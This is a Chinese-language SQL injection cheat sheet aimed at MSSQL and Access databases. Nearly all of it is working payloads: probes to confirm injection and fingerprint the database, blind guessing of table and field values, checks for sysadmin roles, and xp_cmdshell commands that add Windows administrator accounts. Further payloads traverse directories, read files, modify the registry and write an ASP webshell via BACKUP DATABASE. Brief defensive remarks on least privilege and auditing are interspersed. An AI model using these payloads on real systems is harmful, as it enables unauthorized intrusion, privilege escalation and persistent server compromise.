1.判断是否有注入;and 1=1 ;and 1=2 (两次请求返回的页面不同,说明参数被直接拼接进了SQL语句)
2.初步判断是否是mssql ;and user>0 (依赖服务器把类型转换的出错信息回显给客户端;关闭详细错误回显可削弱这类判断)
3.注入参数是字符'and [查询条件] and ''='
4.搜索时没过滤参数的'and [查询条件] and '%25'='
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.猜表名 ;and (select Count(*) from [表名])>0
7.猜字段 ;and (select Count(字段名) from 表名)>0
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 表名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0
10.测试权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
(IS_SRVROLEMEMBER 返回1表示当前登录属于该固定服务器角色,IS_MEMBER('db_owner') 判断的是当前数据库的 db_owner 角色;Web应用的连接帐户不应属于其中任何一个)
11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
(以上语句都要求应用的数据库连接帐户具有 sysadmin 一类的高权限;xp_cmdshell 自 SQL Server 2005 起默认关闭。让应用使用低权限帐户连接,并审计 sp_addlogin、sp_addsrvrolemember、xp_cmdshell 的调用,可以阻断或发现这类操作)
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
13.mssql中的存储过程
(下列 xp_reg* 都是 master 库中的扩展存储过程;收回非管理帐户对它们的执行权限,并让应用以低权限帐户连接,可限制此类注册表访问)
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种:REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='c:\l.asp';
(该方法依赖连接帐户拥有执行 backup database 的权限,且 SQL Server 服务帐户对目标路径有写权限;收紧这两项权限、并监控Web目录下新出现的脚本文件,可以阻断或发现此类写入)
15.mssql内置函数
;and (select @@version)>0 获得SQL Server的版本信息(其中也包含所在Windows的版本号)
;and user_name()='dbo' 判断当前连接用户在库中是否映射为dbo(sa、其他sysadmin成员以及数据库所有者都会映射为dbo,并不只有sa)
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库
(带 >0 的几条都是靠类型转换的出错信息把值回显出来;对外只返回通用错误页可以避免这类信息泄露)
16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='g:\wwwtest\l.asp';